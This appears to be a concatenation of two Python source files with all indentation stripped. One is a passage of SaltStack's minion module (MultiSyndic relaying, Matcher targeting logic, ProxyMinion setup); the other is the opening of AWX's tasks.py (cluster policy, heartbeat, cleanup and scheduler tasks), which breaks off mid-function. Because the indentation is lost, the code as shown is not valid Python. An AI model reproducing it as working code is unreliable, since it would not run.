Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(MultiSyndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
self.io_loop = io_loop
self.io_loop.install()
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = {} # mapping of opts['master'] -> syndic
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics.result()
syndic.destroy()
self._syndics[master] = self._connect_syndic(syndic.opts)
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master_id))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master_id))
self._mark_master_dead(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
log.debug('MultiSyndic {0!r} trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag']))
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return recieved with matching master_id, not forwarding')
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._call_syndic('_fire_master',
kwargs={'events': self.raw_events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
},
)
for jid, jid_ret in self.jids.items():
self._call_syndic('_return_pub',
args=(jid_ret, '_syndic_return'),
kwargs={'timeout': self.SYNDIC_EVENT_TIMEOUT},
master_id=jid_ret.get('__master_id__'),
)
self._reset_event_aggregation()
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on ip address or CIDR notation
'''
num_parts = len(tgt.split('/'))
if num_parts > 2:
# Target is not valid CIDR
return False
elif num_parts == 2:
# Target is CIDR
return salt.utils.network.in_subnet(
tgt,
addrs=self.opts['grains'].get('ipv4', [])
)
else:
# Target is an IPv4 address
import socket
try:
socket.inet_aton(tgt)
except socket.error:
# Not a valid IPv4 address
return False
else:
return tgt in self.opts['grains'].get('ipv4', [])
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module
# print opts['proxymodule']
fq_proxyname = 'proxy.'+opts['proxy']['proxytype']
self.proxymodule = salt.loader.proxy(opts, fq_proxyname)
opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy'])
opts['id'] = opts['proxyobject'].id(opts)
opts.update(resolve_dns(opts))
self.opts = opts
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment'],
pillarenv=opts.get('pillarenv')
).compile_pillar()
self.functions, self.returners, self.function_errors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
uid = salt.utils.get_uid(user=opts.get('user', None))
self.proc_dir = get_proc_dir(opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
self.grains_cache = self.opts['grains']
# self._running = True
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
return super(ProxyMinion, self)._prep_mod_opts()
def _load_modules(self, force_refresh=False, notify=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
return super(ProxyMinion, self)._load_modules(force_refresh=force_refresh, notify=notify)
|
tasks.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from collections import OrderedDict, namedtuple
import errno
import functools
import importlib
import json
import logging
import os
import shutil
import stat
import tempfile
import time
import traceback
from distutils.dir_util import copy_tree
from distutils.version import LooseVersion as Version
import yaml
import fcntl
from pathlib import Path
from uuid import uuid4
import urllib.parse as urlparse
import socket
import threading
import concurrent.futures
from base64 import b64encode
import subprocess
# Django
from django.conf import settings
from django.db import transaction, DatabaseError, IntegrityError, ProgrammingError, connection
from django.db.models.fields.related import ForeignKey
from django.utils.timezone import now
from django.utils.encoding import smart_str
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _, gettext_noop
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django_guid.middleware import GuidMiddleware
# Django-CRUM
from crum import impersonate
# GitPython
import git
from gitdb.exc import BadName as BadGitName
# Runner
import ansible_runner
# Receptor
from receptorctl.socket_interface import ReceptorControl
# AWX
from awx import __version__ as awx_application_version
from awx.main.constants import PRIVILEGE_ESCALATION_METHODS, STANDARD_INVENTORY_UPDATE_ENV
from awx.main.access import access_registry
from awx.main.redact import UriCleaner
from awx.main.models import (
Schedule,
TowerScheduleState,
Instance,
InstanceGroup,
UnifiedJob,
Notification,
Inventory,
InventorySource,
SmartInventoryMembership,
Job,
AdHocCommand,
ProjectUpdate,
InventoryUpdate,
SystemJob,
JobEvent,
ProjectUpdateEvent,
InventoryUpdateEvent,
AdHocCommandEvent,
SystemJobEvent,
build_safe_env,
)
from awx.main.constants import ACTIVE_STATES
from awx.main.exceptions import AwxTaskError, PostRunError
from awx.main.queue import CallbackQueueDispatcher
from awx.main.dispatch.publish import task
from awx.main.dispatch import get_local_queuename, reaper
from awx.main.utils import (
update_scm_url,
ignore_inventory_computed_fields,
ignore_inventory_group_removal,
extract_ansible_vars,
schedule_task_manager,
get_awx_version,
deepmerge,
parse_yaml_or_json,
)
from awx.main.utils.execution_environments import get_default_execution_environment, get_default_pod_spec
from awx.main.utils.ansible import read_ansible_config
from awx.main.utils.external_logging import reconfigure_rsyslog
from awx.main.utils.safe_yaml import safe_dump, sanitize_jinja
from awx.main.utils.reload import stop_local_services
from awx.main.utils.pglock import advisory_lock
from awx.main.utils.handlers import SpecialInventoryHandler
from awx.main.consumers import emit_channel_notification
from awx.main import analytics
from awx.conf import settings_registry
from awx.conf.license import get_license
from awx.main.analytics.subsystem_metrics import Metrics
from rest_framework.exceptions import PermissionDenied
__all__ = [
'RunJob',
'RunSystemJob',
'RunProjectUpdate',
'RunInventoryUpdate',
'RunAdHocCommand',
'handle_work_error',
'handle_work_success',
'apply_cluster_membership_policies',
'update_inventory_computed_fields',
'update_host_smart_inventory_memberships',
'send_notifications',
'purge_old_stdout_files',
]
HIDDEN_PASSWORD = '**********'
OPENSSH_KEY_ERROR = u'''\
It looks like you're trying to use a private key in OpenSSH format, which \
isn't supported by the installed version of OpenSSH on this instance. \
Try upgrading OpenSSH or providing your private key in an different format. \
'''
logger = logging.getLogger('awx.main.tasks')
class InvalidVirtualenvError(Exception):
def __init__(self, message):
self.message = message
def dispatch_startup():
startup_logger = logging.getLogger('awx.main.tasks')
startup_logger.debug("Syncing Schedules")
for sch in Schedule.objects.all():
try:
sch.update_computed_fields()
except Exception:
logger.exception("Failed to rebuild schedule {}.".format(sch))
#
# When the dispatcher starts, if the instance cannot be found in the database,
# automatically register it. This is mostly useful for openshift-based
# deployments where:
#
# 2 Instances come online
# Instance B encounters a network blip, Instance A notices, and
# deprovisions it
# Instance B's connectivity is restored, the dispatcher starts, and it
# re-registers itself
#
# In traditional container-less deployments, instances don't get
# deprovisioned when they miss their heartbeat, so this code is mostly a
# no-op.
#
apply_cluster_membership_policies()
cluster_node_heartbeat()
Metrics().clear_values()
# Update Tower's rsyslog.conf file based on loggins settings in the db
reconfigure_rsyslog()
def inform_cluster_of_shutdown():
try:
this_inst = Instance.objects.get(hostname=settings.CLUSTER_HOST_ID)
this_inst.capacity = 0 # No thank you to new jobs while shut down
this_inst.save(update_fields=['capacity', 'modified'])
try:
reaper.reap(this_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(this_inst.hostname))
logger.warning('Normal shutdown signal for instance {}, ' 'removed self from capacity pool.'.format(this_inst.hostname))
except Exception:
logger.exception('Encountered problem with normal shutdown signal.')
@task(queue=get_local_queuename)
def apply_cluster_membership_policies():
started_waiting = time.time()
with advisory_lock('cluster_policy_lock', wait=True):
lock_time = time.time() - started_waiting
if lock_time > 1.0:
to_log = logger.info
else:
to_log = logger.debug
to_log('Waited {} seconds to obtain lock name: cluster_policy_lock'.format(lock_time))
started_compute = time.time()
all_instances = list(Instance.objects.order_by('id'))
all_groups = list(InstanceGroup.objects.prefetch_related('instances'))
total_instances = len(all_instances)
actual_groups = []
actual_instances = []
Group = namedtuple('Group', ['obj', 'instances', 'prior_instances'])
Node = namedtuple('Instance', ['obj', 'groups'])
# Process policy instance list first, these will represent manually managed memberships
instance_hostnames_map = {inst.hostname: inst for inst in all_instances}
for ig in all_groups:
group_actual = Group(obj=ig, instances=[], prior_instances=[instance.pk for instance in ig.instances.all()]) # obtained in prefetch
for hostname in ig.policy_instance_list:
if hostname not in instance_hostnames_map:
logger.info("Unknown instance {} in {} policy list".format(hostname, ig.name))
continue
inst = instance_hostnames_map[hostname]
group_actual.instances.append(inst.id)
# NOTE: arguable behavior: policy-list-group is not added to
# instance's group count for consideration in minimum-policy rules
if group_actual.instances:
logger.debug("Policy List, adding Instances {} to Group {}".format(group_actual.instances, ig.name))
actual_groups.append(group_actual)
# Process Instance minimum policies next, since it represents a concrete lower bound to the
# number of instances to make available to instance groups
actual_instances = [Node(obj=i, groups=[]) for i in all_instances if i.managed_by_policy]
logger.debug("Total instances: {}, available for policy: {}".format(total_instances, len(actual_instances)))
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_min_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if len(g.instances) >= g.obj.policy_instance_minimum:
break
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via the policy list
continue
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_min_added.append(i.obj.id)
if policy_min_added:
logger.debug("Policy minimum, adding Instances {} to Group {}".format(policy_min_added, g.obj.name))
# Finally, process instance policy percentages
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_per_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via a minimum policy or policy list
continue
if 100 * float(len(g.instances)) / len(actual_instances) >= g.obj.policy_instance_percentage:
break
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_per_added.append(i.obj.id)
if policy_per_added:
logger.debug("Policy percentage, adding Instances {} to Group {}".format(policy_per_added, g.obj.name))
# Determine if any changes need to be made
needs_change = False
for g in actual_groups:
if set(g.instances) != set(g.prior_instances):
needs_change = True
break
if not needs_change:
logger.debug('Cluster policy no-op finished in {} seconds'.format(time.time() - started_compute))
return
# On a differential basis, apply instances to groups
with transaction.atomic():
for g in actual_groups:
if g.obj.is_container_group:
logger.debug('Skipping containerized group {} for policy calculation'.format(g.obj.name))
continue
instances_to_add = set(g.instances) - set(g.prior_instances)
instances_to_remove = set(g.prior_instances) - set(g.instances)
if instances_to_add:
logger.debug('Adding instances {} to group {}'.format(list(instances_to_add), g.obj.name))
g.obj.instances.add(*instances_to_add)
if instances_to_remove:
logger.debug('Removing instances {} from group {}'.format(list(instances_to_remove), g.obj.name))
g.obj.instances.remove(*instances_to_remove)
logger.debug('Cluster policy computation finished in {} seconds'.format(time.time() - started_compute))
@task(queue='tower_broadcast_all')
def handle_setting_changes(setting_keys):
orig_len = len(setting_keys)
for i in range(orig_len):
for dependent_key in settings_registry.get_dependent_settings(setting_keys[i]):
setting_keys.append(dependent_key)
cache_keys = set(setting_keys)
logger.debug('cache delete_many(%r)', cache_keys)
cache.delete_many(cache_keys)
if any([setting.startswith('LOG_AGGREGATOR') for setting in setting_keys]):
reconfigure_rsyslog()
@task(queue='tower_broadcast_all')
def delete_project_files(project_path):
# TODO: possibly implement some retry logic
lock_file = project_path + '.lock'
if os.path.exists(project_path):
try:
shutil.rmtree(project_path)
logger.debug('Success removing project files {}'.format(project_path))
except Exception:
logger.exception('Could not remove project directory {}'.format(project_path))
if os.path.exists(lock_file):
try:
os.remove(lock_file)
logger.debug('Success removing {}'.format(lock_file))
except Exception:
logger.exception('Could not remove lock file {}'.format(lock_file))
@task(queue='tower_broadcast_all')
def profile_sql(threshold=1, minutes=1):
if threshold <= 0:
cache.delete('awx-profile-sql-threshold')
logger.error('SQL PROFILING DISABLED')
else:
cache.set('awx-profile-sql-threshold', threshold, timeout=minutes * 60)
logger.error('SQL QUERIES >={}s ENABLED FOR {} MINUTE(S)'.format(threshold, minutes))
@task(queue=get_local_queuename)
def send_notifications(notification_list, job_id=None):
if not isinstance(notification_list, list):
raise TypeError("notification_list should be of type list")
if job_id is not None:
job_actual = UnifiedJob.objects.get(id=job_id)
notifications = Notification.objects.filter(id__in=notification_list)
if job_id is not None:
job_actual.notifications.add(*notifications)
for notification in notifications:
update_fields = ['status', 'notifications_sent']
try:
sent = notification.notification_template.send(notification.subject, notification.body)
notification.status = "successful"
notification.notifications_sent = sent
if job_id is not None:
job_actual.log_lifecycle("notifications_sent")
except Exception as e:
logger.exception("Send Notification Failed {}".format(e))
notification.status = "failed"
notification.error = smart_str(e)
update_fields.append('error')
finally:
try:
notification.save(update_fields=update_fields)
except Exception:
logger.exception('Error saving notification {} result.'.format(notification.id))
@task(queue=get_local_queuename)
def gather_analytics():
from awx.conf.models import Setting
from rest_framework.fields import DateTimeField
last_gather = Setting.objects.filter(key='AUTOMATION_ANALYTICS_LAST_GATHER').first()
last_time = DateTimeField().to_internal_value(last_gather.value) if last_gather and last_gather.value else None
gather_time = now()
if not last_time or ((gather_time - last_time).total_seconds() > settings.AUTOMATION_ANALYTICS_GATHER_INTERVAL):
analytics.gather()
@task(queue=get_local_queuename)
def purge_old_stdout_files():
nowtime = time.time()
for f in os.listdir(settings.JOBOUTPUT_ROOT):
if os.path.getctime(os.path.join(settings.JOBOUTPUT_ROOT, f)) < nowtime - settings.LOCAL_STDOUT_EXPIRE_TIME:
os.unlink(os.path.join(settings.JOBOUTPUT_ROOT, f))
logger.debug("Removing {}".format(os.path.join(settings.JOBOUTPUT_ROOT, f)))
@task(queue=get_local_queuename)
def cleanup_execution_environment_images():
if settings.IS_K8S:
return
process = subprocess.run('podman images --filter="dangling=true" --format json'.split(" "), capture_output=True)
if process.returncode != 0:
logger.debug("Cleanup execution environment images: could not get list of images")
return
if len(process.stdout) > 0:
images_system = json.loads(process.stdout)
for e in images_system:
image_name = e["Id"]
logger.debug(f"Cleanup execution environment images: deleting {image_name}")
process = subprocess.run(['podman', 'rmi', image_name, '-f'], stdout=subprocess.DEVNULL)
if process.returncode != 0:
logger.debug(f"Failed to delete image {image_name}")
@task(queue=get_local_queuename)
def cluster_node_heartbeat():
logger.debug("Cluster node heartbeat task.")
nowtime = now()
instance_list = list(Instance.objects.all())
this_inst = None
lost_instances = []
(changed, instance) = Instance.objects.get_or_register()
if changed:
logger.info("Registered tower node '{}'".format(instance.hostname))
for inst in list(instance_list):
if inst.hostname == settings.CLUSTER_HOST_ID:
this_inst = inst
instance_list.remove(inst)
elif inst.is_lost(ref_time=nowtime):
lost_instances.append(inst)
instance_list.remove(inst)
if this_inst:
startup_event = this_inst.is_lost(ref_time=nowtime)
this_inst.refresh_capacity()
if startup_event:
logger.warning('Rejoining the cluster as instance {}.'.format(this_inst.hostname))
return
else:
raise RuntimeError("Cluster Host Not Found: {}".format(settings.CLUSTER_HOST_ID))
# IFF any node has a greater version than we do, then we'll shutdown services
for other_inst in instance_list:
if other_inst.version == "":
continue
if Version(other_inst.version.split('-', 1)[0]) > Version(awx_application_version.split('-', 1)[0]) and not settings.DEBUG:
logger.error(
"Host {} reports version {}, but this node {} is at {}, shutting down".format(
other_inst.hostname, other_inst.version, this_inst.hostname, this_inst.version
)
)
# Shutdown signal will set the capacity to zero to ensure no Jobs get added to this instance.
# The heartbeat task will reset the capacity to the system capacity after upgrade.
stop_local_services(communicate=False)
raise RuntimeError("Shutting down.")
for other_inst in lost_instances:
try:
reaper.reap(other_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(other_inst.hostname))
try:
# Capacity could already be 0 because:
# * It's a new node and it never had a heartbeat
# * It was set to 0 by another tower node running this method
# * It was set to 0 by this node, but auto deprovisioning is off
#
# If auto deprovisining is on, don't bother setting the capacity to 0
# since we will delete the node anyway.
if other_inst.capacity != 0 and not settings.AWX_AUTO_DEPROVISION_INSTANCES:
other_inst.capacity = 0
other_inst.save(update_fields=['capacity'])
logger.error("Host {} last checked in at {}, marked as lost.".format(other_inst.hostname, other_inst.modified))
elif settings.AWX_AUTO_DEPROVISION_INSTANCES:
deprovision_hostname = other_inst.hostname
other_inst.delete()
logger.info("Host {} Automatically Deprovisioned.".format(deprovision_hostname))
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Another instance has marked {} as lost'.format(other_inst.hostname))
else:
logger.exception('Error marking {} as lost'.format(other_inst.hostname))
@task(queue=get_local_queuename)
def awx_k8s_reaper():
if not settings.RECEPTOR_RELEASE_WORK:
return
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
for group in InstanceGroup.objects.filter(is_container_group=True).iterator():
logger.debug("Checking for orphaned k8s pods for {}.".format(group))
pods = PodManager.list_active_jobs(group)
for job in UnifiedJob.objects.filter(pk__in=pods.keys()).exclude(status__in=ACTIVE_STATES):
logger.debug('{} is no longer active, reaping orphaned k8s pod'.format(job.log_format))
try:
pm = PodManager(job)
pm.kube_api.delete_namespaced_pod(name=pods[job.id], namespace=pm.namespace, _request_timeout=settings.AWX_CONTAINER_GROUP_K8S_API_TIMEOUT)
except Exception:
logger.exception("Failed to delete orphaned pod {} from {}".format(job.log_format, group))
@task(queue=get_local_queuename)
def awx_periodic_scheduler():
with advisory_lock('awx_periodic_scheduler_lock', wait=False) as acquired:
if acquired is False:
logger.debug("Not running periodic scheduler, another task holds lock")
return
logger.debug("Starting periodic scheduler")
run_now = now()
state = TowerScheduleState.get_solo()
last_run = state.schedule_last_run
logger.debug("Last scheduler run was: %s", last_run)
state.schedule_last_run = run_now
state.save()
old_schedules = Schedule.objects.enabled().before(last_run)
for schedule in old_schedules:
schedule.update_computed_fields()
schedules = Schedule.objects.enabled().between(last_run, run_now)
invalid_license = False
try:
access_registry[Job](None).check_license(quiet=True)
except PermissionDenied as e:
invalid_license = e
for schedule in schedules:
template = schedule.unified_job_template
schedule.update_computed_fields() # To update next_run timestamp.
if template.cache_timeout_blocked:
logger.warn("Cache timeout is in the future, bypassing schedule for template %s" % str(template.id))
continue
try:
job_kwargs = schedule.get_job_kwargs()
new_unified_job = schedule.unified_job_template.create_unified_job(**job_kwargs)
logger.debug('Spawned {} from schedule {}-{}.'.format(new_unified_job.log_format, schedule.name, schedule.pk))
if invalid_license:
